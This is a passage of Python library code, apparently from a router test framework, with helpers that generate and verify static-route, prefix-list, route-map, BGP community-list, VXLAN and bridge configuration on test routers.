next_hop = static_route.setdefault("next_hop", None)
nexthop_vrf = static_route.setdefault("nexthop_vrf", None)
ip_list = generate_ips(network, no_of_ip)
for ip in ip_list:
addr_type = validate_ip_address(ip)
if addr_type == "ipv4":
cmd = "ip route {}".format(ip)
else:
cmd = "ipv6 route {}".format(ip)
if interface:
cmd = "{} {}".format(cmd, interface)
if next_hop:
cmd = "{} {}".format(cmd, next_hop)
if nexthop_vrf:
cmd = "{} nexthop-vrf {}".format(cmd, nexthop_vrf)
if vrf:
cmd = "{} vrf {}".format(cmd, vrf)
if tag:
cmd = "{} tag {}".format(cmd, str(tag))
if admin_distance:
cmd = "{} {}".format(cmd, admin_distance)
if del_action:
cmd = "no {}".format(cmd)
static_routes_list.append(cmd)
result = create_common_configuration(
tgen, router, static_routes_list, "static_route", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: create_static_routes()")
return result
def create_prefix_lists(tgen, input_dict, build=False):
"""
Create ip prefix lists as per the config provided in input
JSON or input_dict
Parameters
----------
* `tgen` : Topogen object
* `input_dict` : Input dict data, required when configuring from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
# pf_lists_1: name of prefix-list, user defined
# seqid: prefix-list seqid, auto-generated if not given by user
# network: criteria for applying prefix-list
# action: permit/deny
# le: less than or equal number of bits
# ge: greater than or equal number of bits
Example
-------
input_dict = {
"r1": {
"prefix_lists":{
"ipv4": {
"pf_list_1": [
{
"seqid": 10,
"network": "any",
"action": "permit",
"le": "32",
"ge": "30",
"delete": True
}
]
}
}
}
}
Returns
-------
errormsg or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
result = False
try:
for router in input_dict.keys():
if "prefix_lists" not in input_dict[router]:
errormsg = "prefix_lists not present in input_dict"
logger.debug(errormsg)
continue
config_data = []
prefix_lists = input_dict[router]["prefix_lists"]
for addr_type, prefix_data in prefix_lists.iteritems():
if not check_address_types(addr_type):
continue
for prefix_name, prefix_list in prefix_data.iteritems():
for prefix_dict in prefix_list:
if "action" not in prefix_dict or "network" not in prefix_dict:
errormsg = "'action' or network' missing in" " input_dict"
return errormsg
network_addr = prefix_dict["network"]
action = prefix_dict["action"]
le = prefix_dict.setdefault("le", None)
ge = prefix_dict.setdefault("ge", None)
seqid = prefix_dict.setdefault("seqid", None)
del_action = prefix_dict.setdefault("delete", False)
if seqid is None:
seqid = get_seq_id("prefix_lists", router, prefix_name)
else:
set_seq_id("prefix_lists", router, seqid, prefix_name)
if addr_type == "ipv4":
protocol = "ip"
else:
protocol = "ipv6"
cmd = "{} prefix-list {} seq {} {} {}".format(
protocol, prefix_name, seqid, action, network_addr
)
if le:
cmd = "{} le {}".format(cmd, le)
if ge:
cmd = "{} ge {}".format(cmd, ge)
if del_action:
cmd = "no {}".format(cmd)
config_data.append(cmd)
result = create_common_configuration(
tgen, router, config_data, "prefix_list", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return result
def create_route_maps(tgen, input_dict, build=False):
"""
Create route-map on the devices as per the arguments passed
Parameters
----------
* `tgen` : Topogen object
* `input_dict` : Input dict data, required when configuring from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
# route_maps: key, value pair for route-map name and its attribute
# rmap_match_prefix_list_1: user given name for route-map
# action: PERMIT/DENY
# match: key,value pair for match criteria. prefix_list, community-list,
large-community-list or tag. Only one option at a time.
# prefix_list: name of prefix list
# large-community-list: name of large community list
    # community-list: name of community list
# tag: tag id for static routes
# set: key, value pair for modifying route attributes
# localpref: preference value for the network
# med: metric value advertised for AS
# aspath: set AS path value
# weight: weight for the route
# community: standard community value to be attached
# large_community: large community value to be attached
# community_additive: if set to "additive", adds community/large-community
value to the existing values of the network prefix
Example:
--------
input_dict = {
"r1": {
"route_maps": {
"rmap_match_prefix_list_1": [
{
"action": "PERMIT",
"match": {
"ipv4": {
"prefix_list": "pf_list_1"
                        },
                        "ipv6": {
                            "prefix_list": "pf_list_1"
                        },
                        "large-community-list": {
                            "id": "community_1",
                            "exact_match": True
                        },
                        "community_list": {
                            "id": "community_2",
                            "exact_match": True
                        },
                        "tag": "tag_id"
},
"set": {
"locPrf": 150,
"metric": 30,
"path": {
"num": 20000,
"action": "prepend",
},
"weight": 500,
"community": {
"num": "1:2 2:3",
"action": additive
}
"large_community": {
"num": "1:2:3 4:5;6",
"action": additive
},
}
}
]
}
}
}
Returns
-------
errormsg(str) or True
"""
result = False
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
input_dict = deepcopy(input_dict)
try:
for router in input_dict.keys():
if "route_maps" not in input_dict[router]:
logger.debug("route_maps not present in input_dict")
continue
rmap_data = []
for rmap_name, rmap_value in input_dict[router]["route_maps"].iteritems():
for rmap_dict in rmap_value:
del_action = rmap_dict.setdefault("delete", False)
if del_action:
rmap_data.append("no route-map {}".format(rmap_name))
continue
if "action" not in rmap_dict:
errormsg = "action not present in input_dict"
logger.error(errormsg)
return False
rmap_action = rmap_dict.setdefault("action", "deny")
seq_id = rmap_dict.setdefault("seq_id", None)
if seq_id is None:
seq_id = get_seq_id("route_maps", router, rmap_name)
else:
set_seq_id("route_maps", router, seq_id, rmap_name)
rmap_data.append(
"route-map {} {} {}".format(rmap_name, rmap_action, seq_id)
)
if "continue" in rmap_dict:
continue_to = rmap_dict["continue"]
if continue_to:
rmap_data.append("on-match goto {}".format(continue_to))
else:
logger.error(
"In continue, 'route-map entry "
"sequence number' is not provided"
)
return False
if "goto" in rmap_dict:
go_to = rmap_dict["goto"]
if go_to:
rmap_data.append("on-match goto {}".format(go_to))
else:
logger.error(
"In goto, 'Goto Clause number' is not" " provided"
)
return False
if "call" in rmap_dict:
call_rmap = rmap_dict["call"]
if call_rmap:
rmap_data.append("call {}".format(call_rmap))
else:
logger.error(
"In call, 'destination Route-Map' is" " not provided"
)
return False
# Verifying if SET criteria is defined
if "set" in rmap_dict:
set_data = rmap_dict["set"]
ipv4_data = set_data.setdefault("ipv4", {})
ipv6_data = set_data.setdefault("ipv6", {})
local_preference = set_data.setdefault("locPrf", None)
metric = set_data.setdefault("metric", None)
as_path = set_data.setdefault("path", {})
weight = set_data.setdefault("weight", None)
community = set_data.setdefault("community", {})
large_community = set_data.setdefault("large_community", {})
large_comm_list = set_data.setdefault("large_comm_list", {})
set_action = set_data.setdefault("set_action", None)
nexthop = set_data.setdefault("nexthop", None)
origin = set_data.setdefault("origin", None)
ext_comm_list = set_data.setdefault("extcommunity", {})
# Local Preference
if local_preference:
rmap_data.append(
"set local-preference {}".format(local_preference)
)
# Metric
if metric:
rmap_data.append("set metric {} \n".format(metric))
# Origin
if origin:
rmap_data.append("set origin {} \n".format(origin))
# AS Path Prepend
if as_path:
as_num = as_path.setdefault("as_num", None)
as_action = as_path.setdefault("as_action", None)
if as_action and as_num:
rmap_data.append(
"set as-path {} {}".format(as_action, as_num)
)
# Community
if community:
num = community.setdefault("num", None)
comm_action = community.setdefault("action", None)
if num:
cmd = "set community {}".format(num)
if comm_action:
cmd = "{} {}".format(cmd, comm_action)
rmap_data.append(cmd)
else:
logger.error("In community, AS Num not" " provided")
return False
if large_community:
num = large_community.setdefault("num", None)
comm_action = large_community.setdefault("action", None)
if num:
cmd = "set large-community {}".format(num)
if comm_action:
cmd = "{} {}".format(cmd, comm_action)
rmap_data.append(cmd)
else:
logger.error(
"In large_community, AS Num not" " provided"
)
return False
if large_comm_list:
id = large_comm_list.setdefault("id", None)
del_comm = large_comm_list.setdefault("delete", None)
if id:
cmd = "set large-comm-list {}".format(id)
if del_comm:
cmd = "{} delete".format(cmd)
rmap_data.append(cmd)
else:
logger.error("In large_comm_list 'id' not" " provided")
return False
if ext_comm_list:
rt = ext_comm_list.setdefault("rt", None)
del_comm = ext_comm_list.setdefault("delete", None)
if rt:
cmd = "set extcommunity rt {}".format(rt)
if del_comm:
cmd = "{} delete".format(cmd)
rmap_data.append(cmd)
else:
logger.debug("In ext_comm_list 'rt' not" " provided")
return False
# Weight
if weight:
rmap_data.append("set weight {}".format(weight))
if ipv6_data:
nexthop = ipv6_data.setdefault("nexthop", None)
if nexthop:
rmap_data.append("set ipv6 next-hop {}".format(nexthop))
# Adding MATCH and SET sequence to RMAP if defined
if "match" in rmap_dict:
match_data = rmap_dict["match"]
ipv4_data = match_data.setdefault("ipv4", {})
ipv6_data = match_data.setdefault("ipv6", {})
community = match_data.setdefault("community_list", {})
large_community = match_data.setdefault("large_community", {})
large_community_list = match_data.setdefault(
"large_community_list", {}
)
metric = match_data.setdefault("metric", None)
source_vrf = match_data.setdefault("source-vrf", None)
if ipv4_data:
# fetch prefix list data from rmap
prefix_name = ipv4_data.setdefault("prefix_lists", None)
if prefix_name:
rmap_data.append(
"match ip address"
" prefix-list {}".format(prefix_name)
)
# fetch tag data from rmap
tag = ipv4_data.setdefault("tag", None)
if tag:
rmap_data.append("match tag {}".format(tag))
# fetch large community data from rmap
large_community_list = ipv4_data.setdefault(
"large_community_list", {}
)
large_community = match_data.setdefault(
"large_community", {}
)
if ipv6_data:
prefix_name = ipv6_data.setdefault("prefix_lists", None)
if prefix_name:
rmap_data.append(
"match ipv6 address"
" prefix-list {}".format(prefix_name)
)
# fetch tag data from rmap
tag = ipv6_data.setdefault("tag", None)
if tag:
rmap_data.append("match tag {}".format(tag))
# fetch large community data from rmap
large_community_list = ipv6_data.setdefault(
"large_community_list", {}
)
large_community = match_data.setdefault(
"large_community", {}
)
if community:
if "id" not in community:
logger.error(
"'id' is mandatory for "
"community-list in match"
" criteria"
)
return False
cmd = "match community {}".format(community["id"])
exact_match = community.setdefault("exact_match", False)
if exact_match:
cmd = "{} exact-match".format(cmd)
rmap_data.append(cmd)
if large_community:
if "id" not in large_community:
logger.error(
"'id' is mandatory for "
"large-community-list in match "
"criteria"
)
return False
cmd = "match large-community {}".format(
large_community["id"]
)
exact_match = large_community.setdefault(
"exact_match", False
)
if exact_match:
cmd = "{} exact-match".format(cmd)
rmap_data.append(cmd)
if large_community_list:
if "id" not in large_community_list:
logger.error(
"'id' is mandatory for "
"large-community-list in match "
"criteria"
)
return False
cmd = "match large-community {}".format(
large_community_list["id"]
)
exact_match = large_community_list.setdefault(
"exact_match", False
)
if exact_match:
cmd = "{} exact-match".format(cmd)
rmap_data.append(cmd)
if source_vrf:
cmd = "match source-vrf {}".format(source_vrf)
rmap_data.append(cmd)
if metric:
cmd = "match metric {}".format(metric)
rmap_data.append(cmd)
result = create_common_configuration(
tgen, router, rmap_data, "route_maps", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return result
def delete_route_maps(tgen, input_dict):
"""
Delete ip route maps from device
* `tgen` : Topogen object
* `input_dict` : for which router,
route map has to be deleted
Usage
-----
# Delete route-map rmap_1 and rmap_2 from router r1
input_dict = {
"r1": {
"route_maps": ["rmap_1", "rmap__2"]
}
}
result = delete_route_maps("ipv4", input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
route_maps = input_dict[router]["route_maps"][:]
rmap_data = input_dict[router]
rmap_data["route_maps"] = {}
for route_map_name in route_maps:
rmap_data["route_maps"].update({route_map_name: [{"delete": True}]})
return create_route_maps(tgen, input_dict)
def create_bgp_community_lists(tgen, input_dict, build=False):
"""
Create bgp community-list or large-community-list on the devices as per
the arguments passed. Takes list of communities in input.
Parameters
----------
* `tgen` : Topogen object
* `input_dict` : Input dict data, required when configuring from testcase
* `build` : Only for initial setup phase this is set as True.
Usage
-----
input_dict_1 = {
"r3": {
"bgp_community_lists": [
{
"community_type": "standard",
"action": "permit",
"name": "rmap_lcomm_{}".format(addr_type),
"value": "1:1:1 1:2:3 2:1:1 2:2:2",
"large": True
}
]
}
}
result = create_bgp_community_lists(tgen, input_dict_1)
"""
result = False
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
input_dict = deepcopy(input_dict)
try:
for router in input_dict.keys():
if "bgp_community_lists" not in input_dict[router]:
errormsg = "bgp_community_lists not present in input_dict"
logger.debug(errormsg)
continue
config_data = []
community_list = input_dict[router]["bgp_community_lists"]
for community_dict in community_list:
del_action = community_dict.setdefault("delete", False)
community_type = community_dict.setdefault("community_type", None)
action = community_dict.setdefault("action", None)
value = community_dict.setdefault("value", "")
large = community_dict.setdefault("large", None)
name = community_dict.setdefault("name", None)
if large:
cmd = "bgp large-community-list"
else:
cmd = "bgp community-list"
if not large and not (community_type and action and value):
errormsg = (
"community_type, action and value are "
"required in bgp_community_list"
)
logger.error(errormsg)
return False
try:
community_type = int(community_type)
cmd = "{} {} {} {}".format(cmd, community_type, action, value)
except ValueError:
cmd = "{} {} {} {} {}".format(
cmd, community_type, name, action, value
)
if del_action:
cmd = "no {}".format(cmd)
config_data.append(cmd)
result = create_common_configuration(
tgen, router, config_data, "bgp_community_list", build=build
)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return result
def shutdown_bringup_interface(tgen, dut, intf_name, ifaceaction=False):
"""
    Shut down or bring up a router's interface
* `tgen` : Topogen object
* `dut` : Device under test
* `intf_name` : Interface name to be shut/no shut
* `ifaceaction` : Action, to shut/no shut interface,
by default is False
Usage
-----
dut = "r3"
intf = "r3-r1-eth0"
    # Shut down interface
    shutdown_bringup_interface(tgen, dut, intf, False)
    # Bring up interface
shutdown_bringup_interface(tgen, dut, intf, True)
Returns
-------
errormsg(str) or True
"""
router_list = tgen.routers()
if ifaceaction:
logger.info("Bringing up interface : {}".format(intf_name))
else:
logger.info("Shutting down interface : {}".format(intf_name))
interface_set_status(router_list[dut], intf_name, ifaceaction)
def addKernelRoute(
tgen, router, intf, group_addr_range, next_hop=None, src=None, del_action=None
):
"""
Add route to kernel
Parameters:
-----------
* `tgen` : Topogen object
    * `router`: router on which kernel routes need to be added
    * `intf`: interface name via which kernel routes need to be added
    * `group_addr_range`: destination address (or list of addresses)
    * `next_hop`: optional next-hop address
    * `src`: optional source address (ipv6 only)
    * `del_action`: if set, delete the route instead of adding it
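    Usage
    -----
    # Illustrative example; the router, interface and group range are
    # assumptions:
    result = addKernelRoute(tgen, "r1", "r1-r2-eth0", "225.1.1.0/24")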
returns:
--------
errormsg or True
"""
logger.debug("Entering lib API: addKernelRoute()")
rnode = tgen.routers()[router]
if type(group_addr_range) is not list:
group_addr_range = [group_addr_range]
for grp_addr in group_addr_range:
addr_type = validate_ip_address(grp_addr)
if addr_type == "ipv4":
if next_hop is not None:
cmd = "ip route add {} via {}".format(grp_addr, next_hop)
else:
cmd = "ip route add {} dev {}".format(grp_addr, intf)
if del_action:
cmd = "ip route del {}".format(grp_addr)
verify_cmd = "ip route"
elif addr_type == "ipv6":
if intf and src:
cmd = "ip -6 route add {} dev {} src {}".format(grp_addr, intf, src)
else:
cmd = "ip -6 route add {} via {}".format(grp_addr, next_hop)
verify_cmd = "ip -6 route"
if del_action:
cmd = "ip -6 route del {}".format(grp_addr)
logger.info("[DUT: {}]: Running command: [{}]".format(router, cmd))
output = rnode.run(cmd)
        # Verifying if ip route is added to kernel
result = rnode.run(verify_cmd)
logger.debug("{}\n{}".format(verify_cmd, result))
if "/" in grp_addr:
ip, mask = grp_addr.split("/")
if mask == "32" or mask == "128":
grp_addr = ip
if not re_search(r"{}".format(grp_addr), result) and mask is not "0":
errormsg = (
"[DUT: {}]: Kernal route is not added for group"
" address {} Config output: {}".format(router, grp_addr, output)
)
return errormsg
logger.debug("Exiting lib API: addKernelRoute()")
return True
def configure_vxlan(tgen, input_dict):
"""
Add and configure vxlan
    * `tgen`: tgen object
* `input_dict` : data for vxlan config
Usage:
------
input_dict= {
"dcg2":{
"vxlan":[{
"vxlan_name": "vxlan75100",
"vxlan_id": "75100",
"dstport": 4789,
"local_addr": "120.0.0.1",
"learning": "no",
"delete": True
}]
}
}
configure_vxlan(tgen, input_dict)
Returns:
-------
True or errormsg
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
router_list = tgen.routers()
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
if "vxlan" in input_dict[dut]:
for vxlan_dict in input_dict[dut]["vxlan"]:
cmd = "ip link "
del_vxlan = vxlan_dict.setdefault("delete", None)
vxlan_names = vxlan_dict.setdefault("vxlan_name", [])
vxlan_ids = vxlan_dict.setdefault("vxlan_id", [])
dstport = vxlan_dict.setdefault("dstport", None)
local_addr = vxlan_dict.setdefault("local_addr", None)
learning = vxlan_dict.setdefault("learning", None)
config_data = []
if vxlan_names and vxlan_ids:
for vxlan_name, vxlan_id in zip(vxlan_names, vxlan_ids):
cmd = "ip link"
if del_vxlan:
cmd = "{} del {} type vxlan id {}".format(
cmd, vxlan_name, vxlan_id
)
else:
cmd = "{} add {} type vxlan id {}".format(
cmd, vxlan_name, vxlan_id
)
if dstport:
cmd = "{} dstport {}".format(cmd, dstport)
if local_addr:
ip_cmd = "ip addr add {} dev {}".format(
local_addr, vxlan_name
)
if del_vxlan:
ip_cmd = "ip addr del {} dev {}".format(
local_addr, vxlan_name
)
config_data.append(ip_cmd)
cmd = "{} local {}".format(cmd, local_addr)
if learning == "no":
cmd = "{} nolearning".format(cmd)
elif learning == "yes":
cmd = "{} learning".format(cmd)
config_data.append(cmd)
try:
for _cmd in config_data:
logger.info("[DUT: %s]: Running command: %s", dut, _cmd)
rnode.run(_cmd)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def configure_brctl(tgen, topo, input_dict):
"""
Add and configure brctl
    * `tgen`: tgen object
* `input_dict` : data for brctl config
Usage:
------
input_dict= {
dut:{
"brctl": [{
"brctl_name": "br100",
"addvxlan": "vxlan75100",
"vrf": "RED",
"stp": "off"
}]
}
}
configure_brctl(tgen, topo, input_dict)
Returns:
-------
True or errormsg
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
router_list = tgen.routers()
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
if "brctl" in input_dict[dut]:
for brctl_dict in input_dict[dut]["brctl"]:
brctl_names = brctl_dict.setdefault("brctl_name", [])
addvxlans = brctl_dict.setdefault("addvxlan", [])
stp_values = brctl_dict.setdefault("stp", [])
vrfs = brctl_dict.setdefault("vrf", [])
ip_cmd = "ip link set"
for brctl_name, vxlan, vrf, stp in zip(
brctl_names, addvxlans, vrfs, stp_values
):
ip_cmd_list = []
cmd = "ip link add name {} type bridge stp_state {}".format(brctl_name, stp)
logger.info("[DUT: %s]: Running command: %s", dut, cmd)
rnode.run(cmd)
ip_cmd_list.append("{} up dev {}".format(ip_cmd, brctl_name))
if vxlan:
cmd = "{} dev {} master {}".format(ip_cmd, vxlan, brctl_name)
logger.info("[DUT: %s]: Running command: %s", dut, cmd)
rnode.run(cmd)
ip_cmd_list.append("{} up dev {}".format(ip_cmd, vxlan))
if vrf:
ip_cmd_list.append(
"{} dev {} master {}".format(ip_cmd, brctl_name, vrf)
)
for intf_name, data in topo["routers"][dut]["links"].items():
if "vrf" not in data:
continue
if data["vrf"] == vrf:
ip_cmd_list.append(
"{} up dev {}".format(ip_cmd, data["interface"])
)
try:
for _ip_cmd in ip_cmd_list:
logger.info("[DUT: %s]: Running command: %s", dut, _ip_cmd)
rnode.run(_ip_cmd)
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
return True
def configure_interface_mac(tgen, input_dict):
"""
    Configure MAC address on interfaces
    * `tgen`: tgen object
* `input_dict` : data for mac config
input_mac= {
"edge1":{
"br75100": "00:80:48:BA:d1:00,
"br75200": "00:80:48:BA:d1:00
}
}
configure_interface_mac(tgen, input_mac)
Returns:
-------
True or errormsg
"""
router_list = tgen.routers()
for dut in input_dict.keys():
rnode = tgen.routers()[dut]
for intf, mac in input_dict[dut].items():
cmd = "ifconfig {} hw ether {}".format(intf, mac)
logger.info("[DUT: %s]: Running command: %s", dut, cmd)
try:
result = rnode.run(cmd)
if len(result) != 0:
return result
except InvalidCLIError:
# Traceback
errormsg = traceback.format_exc()
logger.error(errormsg)
return errormsg
return True
#############################################
# Verification APIs
#############################################
@retry(attempts=5, wait=2, return_is_str=True, initial_wait=2)
def verify_rib(
tgen,
addr_type,
dut,
input_dict,
next_hop=None,
protocol=None,
tag=None,
metric=None,
fib=None,
):
"""
Data will be read from input_dict or input JSON file, API will generate
same prefixes, which were redistributed by either create_static_routes() or
    advertise_networks_using_network_command() and will verify next_hop and
    that each prefix/route is present in "show ip/ipv6 route {bgp/static} json"
command o/p.
Parameters
----------
* `tgen` : topogen object
* `addr_type` : ip type, ipv4/ipv6
* `dut`: Device Under Test, for which user wants to test the data
* `input_dict` : input dict, has details of static routes
* `next_hop`[optional]: next_hop which needs to be verified,
default: static
* `protocol`[optional]: protocol, default = None
Usage
-----
# RIB can be verified for static routes OR network advertised using
network command. Following are input_dicts to create static routes
and advertise networks using network command. Any one of the input_dict
can be passed to verify_rib() to verify routes in DUT"s RIB.
# Creating static routes for r1
input_dict = {
"r1": {
"static_routes": [{"network": "10.0.20.1/32", "no_of_ip": 9, \
"admin_distance": 100, "next_hop": "10.0.0.2", "tag": 4001}]
}}
# Advertising networks using network command in router r1
input_dict = {
"r1": {
"advertise_networks": [{"start_ip": "20.0.0.0/32",
"no_of_network": 10},
{"start_ip": "30.0.0.0/32"}]
}}
# Verifying ipv4 routes in router r1 learned via BGP
dut = "r2"
protocol = "bgp"
result = verify_rib(tgen, "ipv4", dut, input_dict, protocol = protocol)
Returns
-------
errormsg(str) or True
"""
logger.info("Entering lib API: verify_rib()")
router_list = tgen.routers()
additional_nexthops_in_required_nhs = []
found_hops = []
for routerInput in input_dict.keys():
for router, rnode in router_list.iteritems():
if router != dut:
continue
logger.info("Checking router %s RIB:", router)
# Verifying RIB routes
if addr_type == "ipv4":
command = "show ip route"
else:
command = "show ipv6 route"
found_routes = []
missing_routes = []
if "static_routes" in input_dict[routerInput]:
static_routes = input_dict[routerInput]["static_routes"]
for static_route in static_routes:
if "vrf" in static_route and static_route["vrf"] is not None:
logger.info(
"[DUT: {}]: Verifying routes for VRF:"
" {}".format(router, static_route["vrf"])
)
cmd = "{} vrf {}".format(command, static_route["vrf"])
else:
cmd = "{}".format(command)
if protocol:
cmd = "{} {}".format(cmd, protocol)
cmd = "{} json".format(cmd)
rib_routes_json = run_frr_cmd(rnode, cmd, isjson=True)
# Verifying output dictionary rib_routes_json is not empty
if bool(rib_routes_json) is False:
errormsg = "No route found in rib of router {}..".format(router)
return errormsg
network = static_route["network"]
if "no_of_ip" in static_route:
no_of_ip = static_route["no_of_ip"]
else:
no_of_ip = 1
if "tag" in static_route:
_tag = static_route["tag"]
else:
_tag = None
# Generating IPs for verification
ip_list = generate_ips(network, no_of_ip)
st_found = False
nh_found = False
for st_rt in ip_list:
st_rt = str(ipaddress.ip_network(unicode(st_rt)))
_addr_type = validate_ip_address(st_rt)
if _addr_type != addr_type:
continue
if st_rt in rib_routes_json:
st_found = True
found_routes.append(st_rt)
if fib and next_hop:
if type(next_hop) is not list:
next_hop = [next_hop]
for mnh in range(0, len(rib_routes_json[st_rt])):
if (
"fib"
in rib_routes_json[st_rt][mnh]["nexthops"][0]
):
found_hops.append(
[
rib_r["ip"]
for rib_r in rib_routes_json[st_rt][
mnh
]["nexthops"]
]
)
if found_hops[0]:
missing_list_of_nexthops = set(
found_hops[0]
).difference(next_hop)
additional_nexthops_in_required_nhs = set(
next_hop
).difference(found_hops[0])
if additional_nexthops_in_required_nhs:
logger.info(
"Nexthop "
"%s is not active for route %s in "
"RIB of router %s\n",
additional_nexthops_in_required_nhs,
st_rt,
dut,
)
errormsg = (
"Nexthop {} is not active"
" for route {} in RIB of router"
" {}\n".format(
additional_nexthops_in_required_nhs,
st_rt,
dut,
)
)
return errormsg
else:
nh_found = True
elif next_hop and fib is None:
if type(next_hop) is not list:
next_hop = [next_hop]
found_hops = [
rib_r["ip"]
for rib_r in rib_routes_json[st_rt][0]["nexthops"]
]
if found_hops:
missing_list_of_nexthops = set(
found_hops
).difference(next_hop)
additional_nexthops_in_required_nhs = set(
next_hop
).difference(found_hops)
if additional_nexthops_in_required_nhs:
logger.info(
"Missing nexthop %s for route"
" %s in RIB of router %s\n",
additional_nexthops_in_required_nhs,
st_rt,
dut,
)
errormsg = (
"Nexthop {} is Missing for "
"route {} in RIB of router {}\n".format(
additional_nexthops_in_required_nhs,
st_rt,
dut,
)
)
return errormsg
else:
nh_found = True
if tag:
if "tag" not in rib_routes_json[st_rt][0]:
errormsg = (
"[DUT: {}]: tag is not"
" present for"
" route {} in RIB \n".format(dut, st_rt)
)
return errormsg
if _tag != rib_routes_json[st_rt][0]["tag"]:
errormsg = (
"[DUT: {}]: tag value {}"
" is not matched for"
" route {} in RIB \n".format(dut, _tag, st_rt,)
)
return errormsg
if metric is not None:
if "metric" not in rib_routes_json[st_rt][0]:
errormsg = (
"[DUT: {}]: metric is"
" not present for"
" route {} in RIB \n".format(dut, st_rt)
)
return errormsg
if metric != rib_routes_json[st_rt][0]["metric"]:
errormsg = (
"[DUT: {}]: metric value "
"{} is not matched for "
"route {} in RIB \n".format(dut, metric, st_rt,)
)
return errormsg
else:
missing_routes.append(st_rt)
if nh_found:
logger.info(
"[DUT: {}]: Found next_hop {} for all bgp"
" routes in RIB".format(router, next_hop)
)
if len(missing_routes) > 0:
errormsg = "[DUT: {}]: Missing route in RIB, " "routes: {}".format(
dut, missing_routes
)
return errormsg
if found_routes:
logger.info(
"[DUT: %s]: Verified routes in RIB, found" " routes are: %s\n",
dut,
found_routes,
)
continue
if "bgp" in input_dict[routerInput]:
if (
"advertise_networks"
not in input_dict[routerInput]["bgp"]["address_family"][addr_type][
"unicast"
]
):
continue
found_routes = []
missing_routes = []
advertise_network = input_dict[routerInput]["bgp"]["address_family"][
addr_type
]["unicast"]["advertise_networks"]
# Continue if there are no network advertise
if len(advertise_network) == 0:
continue
for advertise_network_dict in advertise_network:
if "vrf" in advertise_network_dict:
cmd = "{} vrf {} json".format(command, static_route["vrf"])
else:
cmd = "{} json".format(command)
rib_routes_json = run_frr_cmd(rnode, cmd, isjson=True)
# Verifying output dictionary rib_routes_json is not empty
if bool(rib_routes_json) is False:
errormsg = "No route found in rib of router {}..".format(router)
return errormsg
start_ip = advertise_network_dict["network"]
if "no_of_network" in advertise_network_dict:
no_of_network = advertise_network_dict["no_of_network"]
else:
no_of_network = 1
# Generating IPs for verification
ip_list = generate_ips(start_ip, no_of_network)
st_found = False
nh_found = False
for st_rt in ip_list:
st_rt = str(ipaddress.ip_network(unicode(st_rt)))
_addr_type = validate_ip_address(st_rt)
if _addr_type != addr_type:
continue
if st_rt in rib_routes_json:
st_found = True
found_routes.append(st_rt)
if next_hop:
if type(next_hop) is not list:
next_hop = [next_hop]
count = 0
for nh in next_hop:
for nh_dict in rib_routes_json[st_rt][0]["nexthops"]:
if nh_dict["ip"] != nh:
continue
else:
count += 1
if count == len(next_hop):
nh_found = True
else:
errormsg = (
"Nexthop {} is Missing"
" for route {} in "
"RIB of router {}\n".format(next_hop, st_rt, dut)
)
return errormsg
else:
missing_routes.append(st_rt)
if nh_found:
logger.info(
"Found next_hop {} for all routes in RIB"
" of router {}\n".format(next_hop, dut)
)
if len(missing_routes) > 0:
errormsg = (
"Missing {} route in RIB of router {}, "
"routes: {} \n".format(addr_type, dut, missing_routes)
)
return errormsg
if found_routes:
logger.info(
"Verified {} routes in router {} RIB, found"
" routes are: {}\n".format(addr_type, dut, found_routes)
)
logger.info("Exiting lib API: verify_rib()")
return True
def verify_admin_distance_for_static_routes(tgen, input_dict):
"""
API to verify admin distance for static routes as defined in input_dict/
input JSON by running show ip/ipv6 route json command.
Parameter
---------
* `tgen` : topogen object
* `input_dict`: having details like - for which router and static routes
    admin distance needs to be verified
Usage
-----
# To verify admin distance is 10 for prefix 10.0.20.1/32 having next_hop
10.0.0.2 in router r1
input_dict = {
"r1": {
"static_routes": [{
"network": "10.0.20.1/32",
"admin_distance": 10,
"next_hop": "10.0.0.2"
}]
}
}
result = verify_admin_distance_for_static_routes(tgen, input_dict)
Returns
-------
errormsg(str) or True
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
for router in input_dict.keys():
if router not in tgen.routers():
continue
rnode = tgen.routers()[router]
for static_route in input_dict[router]["static_routes"]:
addr_type = validate_ip_address(static_route["network"])
# Command to execute
if addr_type == "ipv4":
command = "show ip route json"
else:
command = "show ipv6 route json"
show_ip_route_json = run_frr_cmd(rnode, command, isjson=True)
logger.info(
"Verifying admin distance for static route %s" " under dut %s:",
static_route,
router,
)
network = static_route["network"]
next_hop = static_route["next_hop"]
admin_distance = static_route["admin_distance"]
if network in show_ip_route_json:
route_data = show_ip_route_json[network][0]
if route_data["nexthops"][0]["ip"] == next_hop:
if route_data["distance"] != admin_distance:
errormsg = (
"Verification failed: admin distance"
" for static route {} under dut {},"
" found:{} but expected:{}".format(
static_route,
router,
route_data["distance"],
admin_distance,
)
)
return errormsg
else:
logger.info(
"Verification successful: admin"
" distance for static route %s under"
" dut %s, found:%s",
static_route,
router,
route_data["distance"],
)
else:
errormsg = (
"Static route {} not found in "
"show_ip_route_json for dut {}".format(network, router)
)
return errormsg
